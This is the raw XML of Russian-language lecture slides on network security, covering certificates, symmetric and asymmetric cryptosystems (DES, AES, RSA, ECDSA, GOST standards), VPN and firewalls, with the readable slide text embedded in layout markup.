          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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1"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сертификаты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1571760"/>
            <a:ext cx="8227440" cy="1497960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Проблема: как не дать злоумышленнику опубликовать поддельный открытый ключ от моего имени?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Text Box 3"/>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B960E92B-37EF-40C3-AE48-CD82E558079A}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="484" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142920" y="3357720"/>
            <a:ext cx="9141840" cy="3017160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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5"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Цепочка сертификатов сервера </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>mail.yandex.ru</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Text Box 2"/>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89A07CE8-DB4E-4EE3-9912-EDE4B1EBF92C}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179280" y="2004840"/>
            <a:ext cx="8962560" cy="3869640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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8"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Виды симметричных криптосистем</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DES – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>первый</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (1977)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, всемирно распространенный</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AES – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>пришел на смену </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DES (2001)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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ГОСТ 28147 1989 года – наш</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Text Box 3"/>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DACB0875-6F48-46F1-A8C5-FA44FE147402}"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1"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Асимметричные криптосистемы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4851000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RSA (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>программа </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PGP – Pretty Good Privacy) – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>устарел, медленный</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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Рюкзачная криптосистема</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ECDSA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Elliptic Curve Digital Signature Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>наиболее перспективный для создания ЭЦП</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ГОСТ 34.10-2002 – наш аналог </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ECDSA</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Text Box 3"/>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AAFAA881-E141-459A-8C6C-D0E98A44DA41}"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1" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316080" y="466560"/>
            <a:ext cx="8254440" cy="2960280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Основные составляющие </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4800"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сетевой безопасности</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Text Box 2"/>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4AF82672-FE30-45A8-9F25-2C2D4B07CBAF}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="293" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286760" y="4429080"/>
            <a:ext cx="1140840" cy="1574280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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4"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>VPN – Virtual Private Network</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Text Box 2"/>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6ECD451C-9795-4E0E-AEC5-C7A57BB656F9}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1670040"/>
            <a:ext cx="9141840" cy="4565160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow"/>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7" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316080" y="466560"/>
            <a:ext cx="6779520" cy="2131560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Защита локальных сетей</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849240" y="3049560"/>
            <a:ext cx="6246360" cy="2360160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="799"/>
              </a:spcBef>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ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>про ???</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Text Box 3"/>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B679EE3B-6CD2-4B00-A276-0D902A531B20}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214720" y="2786040"/>
            <a:ext cx="4760280" cy="3550680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow"/>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1"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Межсетевые экраны</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Text Box 2"/>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9A32AB7B-C94B-4F79-8348-7502C1377B3F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9360" y="2143080"/>
            <a:ext cx="8994240" cy="4212720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow"/>
    </mc:Fallback>
  </mc:AlternateContent>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4"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Межсетевые экраны</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1428840"/>
            <a:ext cx="8227440" cy="5069880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Устанавливаются на границе между локальной сетью и Интернетом (на шлюзе)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>весь трафик проходит через файервол</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Анализируют пакеты:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>заголовок сетевого уровня (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адреса)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
